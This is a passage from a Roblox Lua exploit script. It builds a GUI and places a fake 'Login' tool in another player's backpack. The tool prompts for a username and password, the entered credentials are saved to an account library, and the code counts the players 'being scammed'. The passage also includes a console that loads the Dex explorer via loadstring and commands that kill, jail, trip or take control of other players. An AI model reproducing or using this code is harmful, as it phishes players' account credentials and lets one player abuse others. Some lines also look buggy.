  615. -------
  616. local NewGuiPart52 = Instance.new("TextBox")
  617. NewGuiPart52.Active = false
  618. NewGuiPart52.BackgroundTransparency = 0.5
  619. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  620. NewGuiPart52.BorderSizePixel = 0
  621. NewGuiPart52.Name = "TB1"
  622. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  623. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  624. NewGuiPart52.FontSize = Enum.FontSize.Size18
  625. NewGuiPart52.Text = ""
  626. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  627. NewGuiPart52.TextWrapped = true
  628. NewGuiPart52.Parent = NewGuiPart50
  629. -------
  630. local NewGuiPart53 = Instance.new("TextButton")
  631. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  632. NewGuiPart53.BackgroundTransparency = 0.5
  633. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  634. NewGuiPart53.BorderSizePixel = 0
  635. NewGuiPart53.Name = "TB"
  636. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  637. NewGuiPart53.Selectable = true
  638. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  639. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  640. NewGuiPart53.FontSize = Enum.FontSize.Size18
  641. NewGuiPart53.Text = "Save"
  642. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  643. NewGuiPart53.TextWrapped = true
  644. NewGuiPart53.Parent = NewGuiPart50
  645.  
  646. -------
  647. local NewGuiPart55 = Instance.new("TextLabel")
  648. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  649. NewGuiPart55.BackgroundTransparency = 1
  650. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  651. NewGuiPart55.BorderSizePixel = 0
  652. NewGuiPart55.Name = "TL2"
  653. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  654. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  655. NewGuiPart55.FontSize = Enum.FontSize.Size18
  656. NewGuiPart55.Text = "Tool Name"
  657. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  658. NewGuiPart55.TextWrapped = true
  659. NewGuiPart55.Parent = NewGuiPart50
  660. -------
  661. local NewGuiPart56 = Instance.new("TextButton")
  662. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  663. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  664. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  665. NewGuiPart56.BorderSizePixel = 0
  666. NewGuiPart56.Name = "TL4"
  667. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  668. NewGuiPart56.Selectable = true
  669. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  670. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  671. NewGuiPart56.FontSize = Enum.FontSize.Size14
  672. NewGuiPart56.Text = "CMD"
  673. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  674. NewGuiPart56.Parent = NewGuiPart2
  675. -------
  676. local NewGuiPart57 = Instance.new("Frame")
  677. NewGuiPart57.BackgroundTransparency = 1
  678. NewGuiPart57.Name = "ChatBox"
  679. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  680. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  681. NewGuiPart57.Visible = false
  682. NewGuiPart57.Draggable = true
  683. NewGuiPart57.Parent = NewGuiPart2
  684. -------
  685. local NewGuiPart58 = Instance.new("TextButton")
  686. NewGuiPart58.Active = true
  687. NewGuiPart58.BackgroundTransparency = 0.5
  688. NewGuiPart58.BorderSizePixel = 0
  689. NewGuiPart58.Name = "Chat"
  690. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  691. NewGuiPart58.Selectable = true
  692. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  693. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  694. NewGuiPart58.FontSize = Enum.FontSize.Size14
  695. NewGuiPart58.Text = "Chat"
  696. NewGuiPart58.Parent = NewGuiPart57
  697. -------
  698. local NewGuiPart59 = Instance.new("TextLabel")
  699. NewGuiPart59.BackgroundTransparency = 0.5
  700. NewGuiPart59.BorderSizePixel = 0
  701. NewGuiPart59.Name = "Output"
  702. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  703. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  704. NewGuiPart59.Font = Enum.Font.Legacy
  705. NewGuiPart59.FontSize = Enum.FontSize.Size14
  706. NewGuiPart59.Text = ""
  707. NewGuiPart59.TextWrapped = true
  708. NewGuiPart59.Parent = NewGuiPart57
  709. -------
  710. local NewGuiPart60 = Instance.new("TextBox")
  711. NewGuiPart60.BackgroundTransparency = 0.5
  712. NewGuiPart60.Name = "Input"
  713. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  714. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  715. NewGuiPart60.FontSize = Enum.FontSize.Size28
  716. NewGuiPart60.Text = ""
  717. NewGuiPart60.Parent = NewGuiPart57
  718. -------
  719. local NewGuiPart61 = Instance.new("Frame")
  720. NewGuiPart61.BackgroundTransparency = 1
  721. NewGuiPart61.Name = "CMDS"
  722. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  723. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  724. NewGuiPart61.Visible = false
  725. NewGuiPart61.Draggable = true
  726. NewGuiPart61.Parent = NewGuiPart2
  727. -------
  728. local NewGuiPart62 = Instance.new("TextButton")
  729. NewGuiPart62.Active = true
  730. NewGuiPart62.BackgroundTransparency = 0.5
  731. NewGuiPart62.BorderSizePixel = 0
  732. NewGuiPart62.Name = "Execute"
  733. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  734. NewGuiPart62.Selectable = true
  735. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  736. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  737. NewGuiPart62.FontSize = Enum.FontSize.Size12
  738. NewGuiPart62.Text = "Execute"
  739. NewGuiPart62.Parent = NewGuiPart61
  740. -------
  741. local NewGuiPart63 = Instance.new("TextLabel")
  742. NewGuiPart63.BackgroundTransparency = 0.5
  743. NewGuiPart63.BorderSizePixel = 0
  744. NewGuiPart63.Name = "Output"
  745. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  746. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  747. NewGuiPart63.Font = Enum.Font.Legacy
  748. NewGuiPart63.FontSize = Enum.FontSize.Size14
  749. NewGuiPart63.Text = ""
  750. NewGuiPart63.TextWrapped = true
  751. NewGuiPart63.Parent = NewGuiPart61
  752. -------
  753. local NewGuiPart64 = Instance.new("TextBox")
  754. NewGuiPart64.BackgroundTransparency = 0.5
  755. NewGuiPart64.Name = "CmdInput"
  756. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  757. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  758. NewGuiPart64.FontSize = Enum.FontSize.Size14
  759. NewGuiPart64.Text = ""
  760. NewGuiPart64.Parent = NewGuiPart61
  761.  
  762. local IsRunning = Instance.new("BoolValue")
  763. IsRunning.Value = false
  764. IsRunning.Name = "IsRunning"
  765. IsRunning.Parent = NewGuiPart2
  766.  
  767. local Login = Instance.new("Tool")
  768. Login.CanBeDropped = false
  769. Login.ManualActivationOnly = false
  770. Login.RequiresHandle = false
  771. Login.Name = "Login"
  772. Login.Parent = NewGuiPart1
  773.  
  774. local ToolName = Instance.new("StringValue")
  775. ToolName.Value = "Login"
  776. ToolName.Parent = CoreValues
  777. ToolName.Name = "ToolName"
  778.  
  779.  
  780. local NewGuiPart65 = Instance.new("ScreenGui")
  781. NewGuiPart65.Name = "LoginGui"
  782. NewGuiPart65.Parent = Login
  783. -------
  784. local NewGuiPart66 = Instance.new("Frame")
  785. NewGuiPart66.Name = "ErrorFrame"
  786. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  787. NewGuiPart66.Visible = false
  788. NewGuiPart66.Parent = NewGuiPart65
  789. -------
  790. local NewGuiPart67 = Instance.new("ImageLabel")
  791. NewGuiPart67.Active = false
  792. NewGuiPart67.Selectable = false
  793. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  794. NewGuiPart67.Image = "rbxassetid://423929933"
  795. NewGuiPart67.Parent = NewGuiPart66
  796. -------
  797. local NewGuiPart69 = Instance.new("TextLabel")
  798. NewGuiPart69.BackgroundTransparency = 1
  799. NewGuiPart69.BorderSizePixel = 0
  800. NewGuiPart69.Name = "UserName"
  801. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  802. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  803. NewGuiPart69.Font = Enum.Font.Legacy
  804. NewGuiPart69.FontSize = Enum.FontSize.Size14
  805. NewGuiPart69.Text = "UserName"
  806. NewGuiPart69.Parent = NewGuiPart66
  807. -------
  808. local NewGuiPart70 = Instance.new("TextLabel")
  809. NewGuiPart70.BackgroundTransparency = 1
  810. NewGuiPart70.BorderSizePixel = 0
  811. NewGuiPart70.Name = "Password"
  812. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  813. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  814. NewGuiPart70.Font = Enum.Font.Legacy
  815. NewGuiPart70.FontSize = Enum.FontSize.Size14
  816. NewGuiPart70.Text = "Password"
  817. NewGuiPart70.Parent = NewGuiPart66
  818. -------
  819. local NewGuiPart71 = Instance.new("TextBox")
  820. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  821. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  822. NewGuiPart71.BorderSizePixel = 2
  823. NewGuiPart71.Name = "TB2"
  824. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  825. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  826. NewGuiPart71.Font = Enum.Font.Legacy
  827. NewGuiPart71.FontSize = Enum.FontSize.Size14
  828. NewGuiPart71.Text = ""
  829. NewGuiPart71.Parent = NewGuiPart66
  830. -------
  831. local NewGuiPart72 = Instance.new("ImageButton")
  832. NewGuiPart72.Active = true
  833. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  834. NewGuiPart72.BackgroundTransparency = 0.5
  835. NewGuiPart72.Name = "LoginButton"
  836. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  837. NewGuiPart72.Selectable = true
  838. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  839. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  840. NewGuiPart72.Visible = true
  841. NewGuiPart72.Image = "rbxassetid://431070395"
  842. NewGuiPart72.Parent = NewGuiPart66
  843. -------
  844. local NewGuiPart73 = Instance.new("TextLabel")
  845. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  846. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  847. NewGuiPart73.BorderSizePixel = 0
  848. NewGuiPart73.Name = "TB1"
  849. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  850. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  851. NewGuiPart73.Font = Enum.Font.Legacy
  852. NewGuiPart73.FontSize = Enum.FontSize.Size14
  853. NewGuiPart73.Text = ""
  854. NewGuiPart73.Parent = NewGuiPart66
  855.  
  856.  
  857. local Textg = Instance.new("TextLabel")
  858. Textg.BackgroundColor3 = Color3.new(255,255,255)
  859. Textg.BorderColor3 = Color3.new(0, 0, 0)
  860. Textg.BorderSizePixel = 0
  861. Textg.Name = "Text"
  862. Textg.Position = UDim2.new(0, 90, 0.5,115)
  863. Textg.Size = UDim2.new(0, 200, 0, 20)
  864. Textg.Font = Enum.Font.Legacy
  865. Textg.FontSize = Enum.FontSize.Size14
  866. Textg.Text = ""
  867. Textg.Parent = NewGuiPart66
  868.  
  869. local Done = Instance.new("BoolValue")
  870. Done.Name = "Done"
  871. Done.Value = false
  872. Done.Parent = NewGuiPart66
  873.  
  874. local Folderr = Instance.new("Folder")
  875. Folderr.Parent = CoreValues
  876. Folderr.Name = "Folder"
  877.  
  878.  
  879. local UserName = Instance.new("StringValue")
  880. UserName.Name = "UserName"
  881. UserName.Parent = Folderr
  882.  
  883. local PassWord = Instance.new("StringValue")
  884. PassWord.Name = "Password"
  885. PassWord.Parent = Folderr
  886.  
  887.  
  888.  
  889. local UsingTool = Instance.new("BoolValue")
  890. UsingTool.Parent = CoreValues
  891. UsingTool.Name = "UsingTool"
  892. UsingTool.Value = true
  893.  
  894. NewGuiPart1:Clone().Parent = CoreValues
  895. NewGuiPart65:Clone().Parent = CoreValues
  896.  
  897.  
  898.  
  899. print("MGVX LIB Running")
  900. local Lib = Instance.new("Folder")
  901. Lib.Name = "ACCOUNTLIB"
  902. Lib.Parent = CoreValues
  903.  
  904. if PassWord.Value ~= nil and UserName.Value ~= nil then
  905. namer = Instance.new("Folder")
  906. namer.Parent = Lib
  907. namer.Name = UserName.Value
  908. old = PassWord:Clone()
  909. old.Parent = namer
  910. old.Name = UserName.Value
  911. oldu = UserName:Clone()
  912. oldu.Parent = namer
  913. oldu.Name = UserName.Value
  914. new = PassWord:Clone()
  915. new.Value = ""
  916. new.Name = "PassWord"
  917. new.Parent = Folderr
  918. newu = UserName:Clone()
  919. newu.Value = ""
  920. newu.Name = "UserName"
  921. newu.Parent = Folderr
  922. UserName:Destroy();
  923. PassWord:Destroy();
  924. end
  925.  
  926. --------------FUNCTIONS---------------
  927. local NumofPlayers = game:GetService("Players").NumPlayers
  928. local NumOfPlayersBeingScammed = NumofPlayers-1
  929. local DoneBeingScammed = {}
  930.  
  931.  
  932.  
  933.  
  934.  
  935.  
  936. function Clicked4()
  937.  
  938. if NewGuiPart52.Text ~= nil then
  939. Login.Name = NewGuiPart52.Text
  940. ToolName.Value = NewGuiPart52.Text
  941. end
  942.  
  943. if NewGuiPart52.Text == nil then
  944. Login.Name = "Login"
  945. ToolName.Value = "Login"
  946. end
  947.  
  948.  
  949.  
  950.  
  951. NewGuiPart50.Visible = false
  952.  
  953. end
  954.  
  955.  
  956.  
  957. function Click()
  958. local ppl = game.Players:GetChildren()
  959. local spots = NewGuiPart6:children()
  960. for i = 1,#ppl do
  961. spots[i].Visible = true
  962. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  963. spots[i].TextLabel.Text = ppl[i].Name
  964. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  965. spots[i].TextLabel.Text = ''
  966. spots[i].ImageLabel.Image = ''
  967. end
  968. end
  969. end
  970. function Clicked()
  971. otherp.Backpack:GetChildren().Parent = workspace
  972.  
  973.  
  974. if UsingTool.Value == true then
  975. Login:Clone().Parent = otherp.Backpack
  976. NewGuiPart4.Text = "Scanning..."
  977. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  978. NewGuiPart50.Visible = false
  979. NewGuiPart61.Visible = false
  980. NewGuiPart5.Visible = true
  981. IsRunning.Value = true
  982. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  983. end
  984. end
  985.  
  986.  
  987.  
  988. function Clicked1()
  989. NewGuiPart5.Visible = false
  990. NewGuiPart61.Visible = false
  991. NewGuiPart50.Visible = true
  992. end
  993.  
  994. function Clicked2()
  995. NewGuiPart5.Visible = false
  996. NewGuiPart50.Visible = false
  997. NewGuiPart61.Visible = true
  998. end
  999.  
  1000.  
  1001. plrrr = game.Players.LocalPlayer
  1002. plrr = game.Players:GetChildren()
  1003. Input = NewGuiPart64
  1004. Exe = NewGuiPart62
  1005. Output = NewGuiPart63
  1006. Output.Text = "Welcome, "..plrrr.Name.."."
  1007.  
  1008.  
  1009. game.Players.PlayerAdded:connect(function()
  1010. local ppl = game.Players:GetChildren()
  1011. local spots = NewGuiPart6:children()
  1012. for i = 1,#ppl do
  1013. spots[i].Visible = true
  1014. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1015. spots[i].TextLabel.Text = ppl[i].Name
  1016. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1017. spots[i].TextLabel.Text = ''
  1018. spots[i].ImageLabel.Image = ''
  1019. end
  1020.  
  1021. end
  1022. end)
  1023.  
  1024. game.Players.PlayerRemoving:connect(function()
  1025. local ppl = game.Players:GetChildren()
  1026. local spots = NewGuiPart6:children()
  1027. for i = 1,#ppl do
  1028. spots[i].Visible = true
  1029. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1030. spots[i].TextLabel.Text = ppl[i].Name
  1031. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1032. spots[i].TextLabel.Text = ''
  1033. spots[i].ImageLabel.Image = ''
  1034. end
  1035.  
  1036. end
  1037. end)
  1038.  
  1039.  
  1040. function Clicked3(arg)
  1041. local Cmd = Input
  1042. local allp = game.Players:GetChildren()
  1043. local numb;
  1044. local pp;
  1045. local p;
  1046. local num;
  1047. local argus = {"me", "all",numb,plrr}
  1048.  
  1049. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1050. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1051. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1052. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1053. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1054.  
  1055. spawn(function()
  1056. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1057. end)
  1058. spawn(function()
  1059. loadstring(guu.PropertiesFrame.Properties.Source)()
  1060. end)
  1061. spawn(function()
  1062. loadstring(guu.Selection.Source)()
  1063. end)
  1064.  
  1065.  
  1066.  
  1067. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1068. game.CoreGui.Dex:Destroy()
  1069. end
  1070.  
  1071. if Cmd.Text:lower():sub(1,4) == "hat " then
  1072. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1073. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1074. for i, v in pairs(plrz) do
  1075. coroutine.resume(coroutine.create(function()
  1076. if v and v.Character then
  1077. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1078. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1079. obj:Destroy()
  1080. end
  1081. end))
  1082. end
  1083. end
  1084.  
  1085. if Cmd.Text:lower():sub(1,5) == "cape " then
  1086. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1087. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1088. local str = "torso.BrickColor"
  1089. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1090. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1091. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1092. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1093. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1094. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1095. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1096. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1097. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1098. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1099. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1100. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1101. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1102. if BrickColor.new(teststr) ~= nil then str = teststr end
  1103. end
  1104. for i, v in pairs(plrz) do
  1105. coroutine.resume(coroutine.create(function()
  1106. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1107. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1108. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1109. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1110. local torso = plr.Character.Torso
  1111. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1112. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1113. p.Size = Vector3.new(.2,.2,.2)
  1114. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1115. local motor1 = Instance.new("Motor", p)
  1116. motor1.Part0 = p
  1117. motor1.Part1 = torso
  1118. motor1.MaxVelocity = .01
  1119. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1120. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1121. local wave = false
  1122. repeat wait(1/44)
  1123. local ang = 0.1
  1124. local oldmag = torso.Velocity.magnitude
  1125. local mv = .002
  1126. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1127. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1128. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1129. motor1.DesiredAngle = -ang
  1130. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1131. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1132. if torso.Velocity.magnitude < .1 then wait(.1) end
  1133. until not p or p.Parent ~= torso.Parent
  1134. script:Destroy()
  1135. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1136. end
  1137. end))
  1138. end
  1139. end
  1140.  
  1141. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1142. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1143. for i, v in pairs(plrz) do
  1144. coroutine.resume(coroutine.create(function()
  1145. if v and v:findFirstChild("PlayerGui") and v.Character then
  1146. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1147. end
  1148. end))
  1149. end
  1150. end
  1151.  
  1152.  
  1153. if Cmd.Text:lower():sub(1,5) == "jail " then
  1154. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1155. for i, v in pairs(plrz) do
  1156. coroutine.resume(coroutine.create(function()
  1157. if v and v.Character and v.Character:findFirstChild("Torso") then
  1158. local vname = v.Name
  1159. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1160. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1161. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1162. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1163. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1164. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1165. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1166. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1167. end)
  1168. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1169. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1170. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1171. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1172. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1173. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1174. local msh2 = msh:Clone() msh2.Parent = back
  1175. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1176. local msh4 = msh3:Clone() msh4.Parent = left
  1177. v.Character.Torso.CFrame = cf
  1178. end
  1179. end))
  1180. end
  1181. end
  1182.  
  1183. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1184. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1185. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1186. end
  1187.  
  1188.  
  1189.  
  1190. if Cmd.Text:lower():sub(1,8) == "control " then
  1191. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1192. for i, v in pairs(plrz) do
  1193. coroutine.resume(coroutine.create(function()
  1194. if v and v.Character then
  1195. v.Character.Humanoid.PlatformStand = true
  1196. local w = Instance.new("Weld", plr.Character.Torso )
  1197. w.Part0 = plr.Character.Torso
  1198. w.Part1 = v.Character.Torso
  1199. local w2 = Instance.new("Weld", plr.Character.Head)
  1200. w2.Part0 = plr.Character.Head
  1201. w2.Part1 = v.Character.Head
  1202. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1203. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1204. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1205. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1206. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1207. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1208. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1209. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1210. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1211. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1212. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1213. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1214. plr.Character.Head.face:Destroy()
  1215. for i, p in pairs(v.Character:children()) do
  1216. if p:IsA("BasePart") then
  1217. p.CanCollide = false
  1218. end
  1219. end
  1220. for i, p in pairs(plr.Character:children()) do
  1221. if p:IsA("BasePart") then
  1222. p.Transparency = 1
  1223. elseif p:IsA("Hat") then
  1224. p:Destroy()
  1225. end
  1226. end
  1227. v.Character.Parent = plr.Character
  1228. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1229. end
  1230. end))
  1231. end
  1232. end
  1233.  
  1234. if Cmd.Text:lower():sub(1,5) == "kill " then
  1235. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1236. for i, v in pairs(plrz) do
  1237. coroutine.resume(coroutine.create(function()
  1238. if v and v.Character then v.Character:BreakJoints() end
  1239. end))
  1240. end
  1241. end
  1242.  
  1243.  
  1244.  
  1245. if Cmd.Text:lower():sub(1,5) == "trip " then
  1246. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1247. for i, v in pairs(plrz) do
  1248. coroutine.resume(coroutine.create(function()
  1249. if v and v.Character and v.Character:findFirstChild("Torso") then
  1250. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1251. end
  1252. end))
  1253. end
